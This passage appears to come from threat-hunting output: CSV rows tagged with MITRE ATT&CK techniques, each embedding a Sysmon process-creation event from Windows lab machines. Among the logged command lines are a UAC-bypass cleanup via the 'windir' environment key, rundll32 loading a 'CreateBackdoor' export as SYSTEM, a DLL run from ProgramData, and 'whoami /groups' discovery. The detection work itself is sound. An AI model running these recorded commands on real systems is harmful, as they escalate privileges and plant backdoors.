<Data Name=""LogonId"">0x18d3b3</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9124-5D45-0000-001022926101</Data>
<Data Name=""ParentProcessId"">3180</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Users\IEUser\AppData\Local\Temp\fubuki.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564831398.715586,2019-08-03T15:23:18.715586+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T11:23:18.694577Z"">
</TimeCreated>
<EventRecordID>5407</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-03 11:23:17.636</Data>
<Data Name=""ProcessGuid"">747F3D96-6EA5-5D45-0000-001032CCE100</Data>
<Data Name=""ProcessId"">6068</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-D4E9-5D45-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6EA5-5D45-0000-00107AC9E100</Data>
<Data Name=""ParentProcessId"">932</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\WerFault.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1558969963.990983,2019-05-27T19:12:43.990983+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami /groups ) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:38.290374Z"">
</TimeCreated>
<EventRecordID>6170</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:38.270</Data>
<Data Name=""ProcessGuid"">365ABB72-FE66-5CEB-0000-0010C7F80B00</Data>
<Data Name=""ProcessId"">1168</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">whoami /groups </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FE66-5CEB-0000-001058F50B00</Data>
<Data Name=""ParentProcessId"">3256</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd.exe /c whoami /groups </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1628379198.562808,2021-08-08T03:33:18.562808+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f &amp;&amp; REM \system32\AppHostRegistrationVerifier.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-08-07T23:33:15.303423Z"">
</TimeCreated>
<EventRecordID>557006</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3232"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-08-07 23:33:15.285</Data>
<Data Name=""ProcessGuid"">747F3D96-183B-610F-0000-0010DC6CD400</Data>
<Data Name=""ProcessId"">11324</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f &amp;&amp; REM \system32\AppHostRegistrationVerifier.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1231-610F-0000-002057A80700</Data>
<Data Name=""LogonId"">0x7a857</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">1108</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:18.014591Z"">
</TimeCreated>
<EventRecordID>243523</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.544</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-001056711E00</Data>
<Data Name=""ProcessId"">7380</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:18.014591Z"">
</TimeCreated>
<EventRecordID>243523</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.544</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-001056711E00</Data>
<Data Name=""ProcessId"">7380</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32) in event with Command Line (&quot;C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe&quot;) and Parent Image :C:\Windows\System32\sysprep\sysprep.exe , Parent CommandLine (&quot;C:\Windows\System32\sysprep\sysprep.exe&quot;) in directory : ( C:\Windows\system32\WindowsPowerShell\v1.0\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-14T02:32:51.831307Z"">
</TimeCreated>
<EventRecordID>17729</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2024"" ThreadID=""2004"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-14 02:32:51.728</Data>
<Data Name=""ProcessGuid"">365ABB72-28D3-5CDA-0000-001088C71300</Data>
<Data Name=""ProcessId"">3976</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\WindowsPowerShell\v1.0\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-26E1-5CDA-0000-002045350100</Data>
<Data Name=""LogonId"">0x13545</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-28D3-5CDA-0000-00106DC31300</Data>
<Data Name=""ParentProcessId"">3068</Data>
<Data Name=""ParentImage"">C:\Windows\System32\sysprep\sysprep.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\sysprep\sysprep.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:18.014591Z"">
</TimeCreated>
<EventRecordID>243523</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.544</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-001056711E00</Data>
<Data Name=""ProcessId"">7380</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( &quot;C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-14T02:32:51.831307Z"">
</TimeCreated>
<EventRecordID>17729</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2024"" ThreadID=""2004"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-14 02:32:51.728</Data>
<Data Name=""ProcessGuid"">365ABB72-28D3-5CDA-0000-001088C71300</Data>
<Data Name=""ProcessId"">3976</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\WindowsPowerShell\v1.0\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-26E1-5CDA-0000-002045350100</Data>
<Data Name=""LogonId"">0x13545</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-28D3-5CDA-0000-00106DC31300</Data>
<Data Name=""ParentProcessId"">3068</Data>
<Data Name=""ParentImage"">C:\Windows\System32\sysprep\sysprep.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\sysprep\sysprep.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:58:17.176847Z"">
</TimeCreated>
<EventRecordID>424081</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:58:17.171</Data>
<Data Name=""ProcessGuid"">747F3D96-51F9-5F93-0000-001003125E00</Data>
<Data Name=""ProcessId"">7552</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
<Data Name=""LogonId"">0x8a619</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">1216</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:58:17.176847Z"">
</TimeCreated>
<EventRecordID>424081</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:58:17.171</Data>
<Data Name=""ProcessGuid"">747F3D96-51F9-5F93-0000-001003125E00</Data>
<Data Name=""ProcessId"">7552</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
<Data Name=""LogonId"">0x8a619</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">1216</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
